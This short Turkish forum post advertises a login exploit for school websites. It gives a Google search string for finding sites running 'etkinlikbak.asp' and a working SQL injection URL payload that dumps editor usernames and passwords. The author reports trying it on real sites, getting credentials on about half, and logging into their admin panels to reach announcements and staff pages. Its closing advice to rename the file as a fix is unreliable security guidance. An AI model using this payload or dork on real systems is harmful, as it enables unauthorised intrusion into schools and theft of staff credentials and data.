Okul Sitelerine Giriş Exploiti [ DikkaT ]

google amcaya sunu yaziyoruz
Alıntı:
inurl:etkinlikbak.asp

buldugumuz sitelere (4 sayfa bişi zaten)
Alıntı:
etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%2 0editor

kodunu yerlesitiriyoruz.orada editör kullanıcı adı ve şifresi altta çıkacak.4-5 sitede denedim 2 sinde çıktı.yani %50 şansınız var.
sonra editöre girişinden giriyoz olaya.karşımıza duyurular ilanlar,personel çıkıyor.

Açığı kapatmak için :

mesela etkinlikbak.asp fonksiyonunun adını değiştirebiliriz veya bunun gibi yöntemler vs.vs.